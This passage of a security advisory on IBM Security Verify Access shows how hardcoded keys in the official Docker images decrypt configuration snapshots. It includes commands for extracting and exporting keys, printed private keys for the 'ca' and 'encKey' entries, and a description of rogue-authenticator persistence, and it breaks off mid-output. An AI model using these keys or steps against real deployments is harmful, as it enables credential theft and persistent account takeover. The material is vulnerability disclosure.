kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html
[...]
< HTTP/1.1 200 OK
< X-Frame-Options: SAMEORIGIN
< Server: IBM Security Verify Access
< Content-Type: text/html;charset=UTF-8
[...]
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Device Selection</title>
  <link type="text/css" rel="stylesheet" href="/sps/static/design.css"></link>
  <link type="text/css" rel="stylesheet" href="/sps/mga/user/mgmt/html/device/device_selection.css"></link>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/mgmt_msg.js"></script>
  <script type="text/javascript" src="/sps/static/u2fI18n.js"></script>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/common.js"></script>
  <script type="text/javascript" src="/sps/mga/user/mgmt/html/device/device_selection.js"></script>

On a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html. If device_selection.html is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the device_selection.html webpage available in official IBM Docker images) and the previous /mga/sps/ APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker that enrolled a rogue authenticator to a compromised account can get persistence access from the Internet even if the runtime instance is not reachable anymore or if the "regular" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-faced enrolling server will allow the attackers to enroll new authenticators and retrieve current seeds.

Furthermore, with Internet-faced servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite big.

It is also possible to list the target version of a Internet-faced instance (proxifed through WebSEAL) by visiting the /mga/sps/mmfa/user/mgmt/details API (when MFA is enabled in ISVA):

curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . 
{
  "authntrxn_endpoint": "https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending",
  "metadata": {
    "service_name": "Organisation",
    "qrlogin_endpoint": "https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response"
[...]
  "enrollment_endpoint": "https://info.domain.tld/scim/Me",
[...]
  "version": "10.0.8.0",
[...]
}

Details - Reuse of snapshot private keys

The official Docker images have been retrieved and analyzed on a local machine:

kali-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB
kali-docker# docker save 498e181d7395 > ibmcom/verify-access-runtime.tar
kali-docker# docker save c0003aca743c > ibmcom/verify-access-wrp.tar
kali-docker# docker save 206efdd7809c > ibmcom/verify-access.tar
kali-docker# docker save 959f6f1095e9 > ibmcom/verify-access-dsc.tar

It was observed that instances contain custom encryption/decryption keys (device_key.kdb and device_key.sth files) located inside /var/.ca/.

These keys are used by the isva_decrypt utility present in all the images. For example, the /usr/sbin/bootstrap.sh script will decrypt the stored openldap.zip file using isva_decrypt:

Content of /usr/sbin/bootstrap.sh:

[...]
# Decrypt and extract the LDAP configuration. 
isva_decrypt $snapshot_tmp_dir/openldap.zip

unzip -q -o $snapshot_tmp_dir/openldap.zip -d /
[...]

When doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (device_key.kdb and device_key.sth) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:

kali-docker# ls -la */*/var/.ca/*            
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
-rw------- 1 root root 5991 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
-rw------- 1 root root  193 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth

kali-docker# sha256sum */*/var/.ca/*|sort|uniq
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb

Using these keys and the IBM Crypto for C programs, we can successfully decrypt the openldap.zip file - an encrypted zip file - available inside the default.snapshot file - this file contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The openldap.zip file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using isva_decrypt, it is required to create a /var/.ca directory containing device_key.kdb and device_key.sth in a test machine):

kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip
[...]
writev(5, [{iov_base="", iov_len=0}, {iov_base="2s\0\0etc/openldap/schema/nis.ldif"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\321\0\0etc/openldap/schema/collectiv"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\0etc/openldap/slapd-replica.conf"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="data/secAuthority-default/__db.0"..., iov_len=1024}], 2) = 1024
read(4, "\271=b\223\205\320\277\365\207\302#T\255\355\374Ct\222\332M`3%\341\361I\301\233j\34\1\355"..., 8191) = 1124
writev(5, [{iov_base="", iov_len=0}, {iov_base="PK\1\2\36\3\24\0\0\0\10\0\4Z-UQ\202\212<V\2\0\0\0 \0\0000\0\30\0"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="+\0\30\0\0\0\0\0\0\0\0\0\200\201\256\213\7\0var/openldap/d"..., iov_len=1024}], 2) = 1024
read(4, "", 8191)                       = 0
close(4)                                = 0
write(5, "\5\0\3\250\302\36cux\v\0\1\4\0\0\0\0\4\0\0\0\0PK\5\6\0\0\0\0[\0"..., 44) = 44
close(5)                                = 0
unlink("openldap.zip")                  = 0
rename("/tmp/tmp.pxiQjh", "openldap.zip") = 0
unlink("/tmp/tmp.pxiQjh")               = -1 ENOENT (No such file or directory)
close(3)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++
kali-decryption% file openldap.zip 
openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store

While doing an analysis of the zip file, we can find:

- credentials;
- passwords (e.g. in etc/openldap/dynamic/replica-1.conf and etc/openldap/dynamic/passwd.conf)
- RSA keys + certificates (e.g. in etc/openldap/dynamic/server.key)
- users in the logs.

The unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:

kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done
./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb

This allows an attacker to extract several private keys:

Bag Attributes
    friendlyName: ca
    localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74
01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26
X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM
+Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr
qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R
CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs
RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm
MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu
894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy
MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l
zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr
7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM
iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV
PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+
dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo
o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT
E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV
mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM
m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki
xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG
0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb
TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd
Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm
ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj
dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR
uxhPVbNJYbPOs02by37UXn8=
-----END PRIVATE KEY-----
Bag Attributes
    friendlyName: encKey
    localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD
N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM
x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6
szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw
G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM
DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3
R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv
9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ
eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi
T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH
f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt
VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A
UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH
blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE
X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC
PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG
5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG
UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA
X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4
DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649
+YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee
ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU
WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC
5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy
NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH
arClGP/McDNH4FD3S9dgJQ==
-----END PRIVATE KEY-----

And the corresponding certificates:

Bag Attributes
    friendlyName: ca
    localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF 
subject=C = us, O = ibm, OU = isam, CN = ca
issuer=C = us, O = ibm, OU = isam, CN = ca
-----BEGIN CERTIFICATE-----
MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE
BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew
IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz
MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA
fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0
6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90
3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW
bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST
8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB
o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU
V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj
Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP
Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b
dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641
bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr
gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75
cGAPLNhMRL8=
-----END CERTIFICATE-----
Bag Attributes
    friendlyName: encKey
    localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 
subject=C = US, O = IBM, OU = GSKIT, CN = encKey
issuer=C = US, O = IBM, OU = GSKIT, CN = encKey
-----BEGIN CERTIFICATE-----
MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE
BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu
Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT
AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL
ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib
ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7
AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE
MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii
ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE
PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ
ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC
pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK
pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi
enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi
0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b
QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2
4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5
CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD
8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB
+NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM
Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/
GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj
DxxuUpf+LWXLEw==
-----END CERTIFICATE-----

After the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:

kali-docker# openssl x509 -in ca.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=us, O=ibm, OU=isam, CN=ca
        Validity
            Not Before: Mar 21 04:57:03 2019 GMT
            Not After : May 11 04:57:03 2101 GMT
        Subject: C=us, O=ibm, OU=isam, CN=ca
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:
